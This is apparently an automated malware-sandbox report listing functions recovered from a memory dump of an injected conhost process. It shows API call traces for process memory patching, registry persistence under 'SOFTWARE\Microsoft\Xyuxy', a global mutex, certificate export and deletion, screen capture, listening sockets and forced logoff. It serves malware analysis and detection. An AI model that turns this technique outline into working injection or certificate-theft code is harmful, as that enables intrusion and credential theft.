Function 000C7BF7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108

APIs

Part of subcall function 000C7BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,000BC168,DB84D88A,?,?,?,000BBD76,00000000,00000000,00000004,?,?,000BC160), ref: 000C7BC7

VirtualProtectEx.KERNELBASE(000000FF,000BC160,0000001E,00000040,`#,000BC158,00000004,?,?,?,?,000BBE97,6A000D23,00000000), ref: 000C7C24
ReadProcessMemory.KERNELBASE(000000FF,000BC160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,000BBE97,6A000D23,00000000), ref: 000C7C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 000C7CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 000C7CED
VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#,`#,?,?,?,?,000BBE97,6A000D23,00000000,?,?,000BC160,000D2360), ref: 000C7D05

Strings

`#, xrefs: 000C7C17, 000C7CF7, 000C7CFB, 000C7C1A, 000C7CFA

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C4B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C4B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C4B3F
GetLastError.KERNEL32(?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C4B45

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C4B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C4B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C4B8B

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

CloseHandle.KERNEL32(?), ref: 000C4BB6

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 000C76B3

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 000C76E2

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

RegCloseKey.KERNEL32(?), ref: 000C7702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 000C7699

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BE89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 000BE8E0

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Part of subcall function 000C768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 000C76B3
Part of subcall function 000C768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 000C76E2
Part of subcall function 000C768E: RegCloseKey.KERNEL32(?), ref: 000C7702

Strings

Qanyodfyy, xrefs: 000BE8B7, 000BE8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 000BE8A7, 000BE8B2, 000BE8BE, 000BE8D9

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C6AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08), ref: 000C6AC3
GetLastError.KERNEL32(?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08,?,?,00000000), ref: 000C6AC9

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08), ref: 000C6AEF

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C49D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,000C2326,000000FF,000D2C08,?,?,00000000), ref: 000C49E2

Part of subcall function 000C6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08), ref: 000C6AC3
Part of subcall function 000C6AAA: GetLastError.KERNEL32(?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08,?,?,00000000), ref: 000C6AC9
Part of subcall function 000C6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,000C49F4,?,?,?,000C2326,000000FF,000D2C08), ref: 000C6AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,000C2326,000000FF,000D2C08), ref: 000C4A0E

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

CloseHandle.KERNEL32(?), ref: 000C4A23

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,000C9EAB,?,?,00000004), ref: 000C7658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,000C9EAB,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7672
RegCloseKey.ADVAPI32(00000004,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7681

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C2BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 000C20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 000C2105
Part of subcall function 000C20C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000C2172
Part of subcall function 000C20C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 000C21A7
Part of subcall function 000C20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000C21DB
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 000C21FA
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 000C220C
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 000C221E
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 000C2230
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 000C2242
Part of subcall function 000C20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 000C2254
Part of subcall function 000C20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 000C228D
Part of subcall function 000C20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 000C229C
Part of subcall function 000C20C4: InitializeCriticalSection.KERNEL32(000D400C,?,?,00000000), ref: 000C22C9
Part of subcall function 000C20C4: WSAStartup.WS2_32(00000202,?), ref: 000C22DF
Part of subcall function 000C20C4: CreateEventW.KERNEL32(000D2C30,00000001,00000000,00000000,?,?,00000000), ref: 000C2300
Part of subcall function 000C20C4: GetLengthSid.ADVAPI32(00000000,000000FF,000D2C08,?,?,00000000), ref: 000C2335
Part of subcall function 000C20C4: GetCurrentProcessId.KERNEL32(00000000,016AF7D0,00000000,?,?,00000000), ref: 000C2362

Part of subcall function 000C2A32: CloseHandle.KERNEL32(000D2AF0), ref: 000C2AF2

Part of subcall function 000BE959: CreateMutexW.KERNELBASE(000D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,000B4E69,?,?,?,743C152E,00000002), ref: 000BE97F

CoInitializeEx.OLE32(00000000,00000002), ref: 000C2C62

Part of subcall function 000C9837: CoUninitialize.OLE32 ref: 000C9845

Part of subcall function 000CD486: CertOpenSystemStoreW.CRYPT32(00000000,000B4BBC,?,00000000,00000001), ref: 000CD4A1
Part of subcall function 000CD486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 000CD4BD
Part of subcall function 000CD486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 000CD4C9
Part of subcall function 000CD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 000CD508
Part of subcall function 000CD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 000CD538
Part of subcall function 000CD486: CharLowerW.USER32 ref: 000CD556
Part of subcall function 000CD486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 000CD561
Part of subcall function 000CD486: CertCloseStore.CRYPT32(?,00000000), ref: 000CD5EA

Part of subcall function 000CD5FB: CertOpenSystemStoreW.CRYPT32(00000000,000B4BBC,?,00000001,000C2C2A), ref: 000CD606
Part of subcall function 000CD5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,000C2C2A), ref: 000CD61F
Part of subcall function 000CD5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,000C2C2A), ref: 000CD62A
Part of subcall function 000CD5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,000C2C2A), ref: 000CD632
Part of subcall function 000CD5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,000C2C2A), ref: 000CD63E

Part of subcall function 000CA138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 000CA170

Strings

@, xrefs: 000C2C99

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BE959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(000D2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,000B4E69,?,?,?,743C152E,00000002), ref: 000BE97F

Part of subcall function 000BE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 000BE8E0

Part of subcall function 000C6B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 000C6B0A
Part of subcall function 000C6B07: CloseHandle.KERNEL32(00000000), ref: 000C6B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 000BE95A, 000BE963, 000BE96C, 000BE977

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C9D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(000D3F24,00000000,7718F8FF), ref: 000C9D8F

Part of subcall function 000C7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,000C9E26,?,?), ref: 000C75AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 000C9E63

Part of subcall function 000C763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,000C9EAB,?,?,00000004), ref: 000C7658
Part of subcall function 000C763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,000C9EAB,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7672
Part of subcall function 000C763A: RegCloseKey.ADVAPI32(00000004,?,?,000C9EAB,?,?,00000004,?,00000004), ref: 000C7681

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C7711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,000C9E78,?), ref: 000C771E
Part of subcall function 000C7711: RegCloseKey.KERNEL32(?), ref: 000C772E

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C1EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 000C1F2C

Part of subcall function 000C8C40: PathCombineW.SHLWAPI(000C1F45,000C1F45,?), ref: 000C8C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 000C1F56

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C7607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,000C9E26,?,?,?,000C75CD,?,?,00000000,00000004,?), ref: 000C761F
RegCloseKey.KERNEL32(?,?,000C75CD,?,?,00000000,00000004,?,?,?,?,000C9E26,?,?), ref: 000C762D

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C7711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,000C9E78,?), ref: 000C771E
RegCloseKey.KERNEL32(?), ref: 000C772E

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BBE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,000BC160,000D2360), ref: 000BBE72

Part of subcall function 000BBD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,000BC160,00000000,00000000,00000004,?,?,000BC160,000D2360), ref: 000BBD86
Part of subcall function 000BBD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,000BC160,000D2360), ref: 000BBD9C
Part of subcall function 000BBD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,000BC160,000BC160,?,?,000BC160,000D2360), ref: 000BBDB6

Part of subcall function 000C7BF7: VirtualProtectEx.KERNELBASE(000000FF,000BC160,0000001E,00000040,`#,000BC158,00000004,?,?,?,?,000BBE97,6A000D23,00000000), ref: 000C7C24
Part of subcall function 000C7BF7: ReadProcessMemory.KERNELBASE(000000FF,000BC160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,000BBE97,6A000D23,00000000), ref: 000C7C4B
Part of subcall function 000C7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 000C7CC5
Part of subcall function 000C7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 000C7CED
Part of subcall function 000C7BF7: VirtualProtectEx.KERNELBASE(000000FF,?,0000001E,`#,`#,?,?,?,?,000BBE97,6A000D23,00000000,?,?,000BC160,000D2360), ref: 000C7D05

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C7595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,000C9E26,?,?), ref: 000C75AD

Part of subcall function 000C7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,000C9E26,?,?,?,000C75CD,?,?,00000000,00000004,?), ref: 000C761F
Part of subcall function 000C7607: RegCloseKey.KERNEL32(?,?,000C75CD,?,?,00000000,00000004,?,?,?,?,000C9E26,?,?), ref: 000C762D

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Non-executed Functions

Function 000CD486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,000B4BBC,?,00000000,00000001), ref: 000CD4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 000CD4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 000CD4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 000CD508

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 000CD538
CharLowerW.USER32 ref: 000CD556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 000CD561

Part of subcall function 000CD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,000CD581,?,?,00000000), ref: 000CD43F

Part of subcall function 000C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000C40CF

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

CertCloseStore.CRYPT32(?,00000000), ref: 000CD5EA

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000CD5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,000B4BBC,?,00000001,000C2C2A), ref: 000CD606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,000C2C2A), ref: 000CD61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,000C2C2A), ref: 000CD62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,000C2C2A), ref: 000CD632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,000C2C2A), ref: 000CD63E

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C64FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 000C6506
bind.WS2_32(00000000,?,-0000001D), ref: 000C6526
listen.WS2_32(00000000,?), ref: 000C6535
#3.WS2_32(00000000), ref: 000C6540

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C67DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 000C67E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 000C6804
#3.WS2_32(00000000), ref: 000C680F

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000BEA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 000BEA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 000BEA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 000BEA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 000BEA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 000BEA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 000BEA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 000BEA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 000BEAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 000BEAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 000BEAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 000BEB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 000BEB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 000BEB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 000BEB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 000BEB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 000BEB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 000BEB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 000BEB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 000BEB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 000BEC10
GetIconInfo.USER32(00000000,?), ref: 000BEC25
GetCursorPos.USER32(?), ref: 000BEC33
DrawIcon.USER32(?,?,?,?), ref: 000BED04

Part of subcall function 000C338B: HeapAlloc.KERNEL32(00000008,-00000004,000C4B59,00000000,?,?,?,000C1E08,00000000,000C22ED,?,?,00000000), ref: 000C339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 000BED85

Part of subcall function 000C33BB: HeapFree.KERNEL32(00000000,00000000,000C4BB2), ref: 000C33CE

FreeLibrary.KERNEL32(00000000), ref: 000BEE9C
FreeLibrary.KERNEL32(?), ref: 000BEEA6
FreeLibrary.KERNEL32(00000000), ref: 000BEEB0

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 000BEA63
DeleteObject, xrefs: 000BEB54
GdipGetImageEncoders, xrefs: 000BEA8A
CreateStreamOnHGlobal, xrefs: 000BEAEC
GdiplusStartup, xrefs: 000BEA4B
CreateDCW, xrefs: 000BEB09
GdipDisposeImage, xrefs: 000BEA70
gdi32.dll, xrefs: 000BEB02
GetDeviceCaps, xrefs: 000BEB2D
GdipSaveImageToStream, xrefs: 000BEA97
BitBlt, xrefs: 000BEB47
DeleteDC, xrefs: 000BEB61
CreateCompatibleBitmap, xrefs: 000BEB20
GdiplusShutdown, xrefs: 000BEA56
CreateCompatibleDC, xrefs: 000BEB14
ole32.dll, xrefs: 000BEAE5
GdipGetImageEncodersSize, xrefs: 000BEA7D
gdiplus.dll, xrefs: 000BEA25
DISPLAY, xrefs: 000BEBDE
SelectObject, xrefs: 000BEB3A

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000B54A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 000BDCA2: GetClassNameW.USER32(001E01CA,?,00000101), ref: 000BDCBD

GetWindowInfo.USER32(?,?), ref: 000B5515
IntersectRect.USER32(?,?,-00000114), ref: 000B5538
IntersectRect.USER32(?,?,-00000114), ref: 000B558E
GetDC.USER32(00000000), ref: 000B55D2
CreateCompatibleDC.GDI32(00000000), ref: 000B55E3
ReleaseDC.USER32(00000000,00000000), ref: 000B55ED
SelectObject.GDI32(00000000,?), ref: 000B5602
DeleteDC.GDI32(00000000), ref: 000B5610
TlsSetValue.KERNEL32(?), ref: 000B565B
EqualRect.USER32(?,?), ref: 000B5675
SaveDC.GDI32(00000000), ref: 000B5680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 000B56BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 000B56CD
RestoreDC.GDI32(00000000,?), ref: 000B56E4
SaveDC.GDI32(00000000), ref: 000B5706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 000B5735
RestoreDC.GDI32(00000000,?), ref: 000B5743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B5756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 000B5766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 000B5778
TlsSetValue.KERNEL32(00000000), ref: 000B5792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B57B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 000B57CE
SelectObject.GDI32(00000000,?), ref: 000B57E4
DeleteDC.GDI32(00000000), ref: 000B57EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000B5813

Part of subcall function 000B53C7: GdiFlush.GDI32 ref: 000B541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 000B5829

Strings

<, xrefs: 000B550B

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C2D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 000C85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 000C85F5
Part of subcall function 000C85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8608
Part of subcall function 000C85D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8630
Part of subcall function 000C85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 000C8648
Part of subcall function 000C85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,000C2D27,?,?,00000000), ref: 000C8662
Part of subcall function 000C85D0: CloseHandle.KERNEL32(?), ref: 000C866B

Part of subcall function 000C8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,000CC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 000C8689
Part of subcall function 000C8678: CloseHandle.KERNEL32(?), ref: 000C8697

CreateMutexW.KERNEL32(000D2C30,00000001,?,32901130,?,00000001,?), ref: 000C2D91
GetLastError.KERNEL32 ref: 000C2DA3
CloseHandle.KERNEL32(000001E6), ref: 000C2DBA

Part of subcall function 000BE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 000BE8E0

Part of subcall function 000C31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C31ED
Part of subcall function 000C31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 000C3216
Part of subcall function 000C31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 000C3271
Part of subcall function 000C31CC: CloseHandle.KERNEL32(00000000), ref: 000C328E
Part of subcall function 000C31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 000C32A1
Part of subcall function 000C31CC: CloseHandle.KERNEL32(?), ref: 000C330E
Part of subcall function 000C31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 000C331A
Part of subcall function 000C31CC: CloseHandle.KERNEL32(000001E6), ref: 000C332B

ExitWindowsEx.USER32(00000014,80000000), ref: 000C2DFD
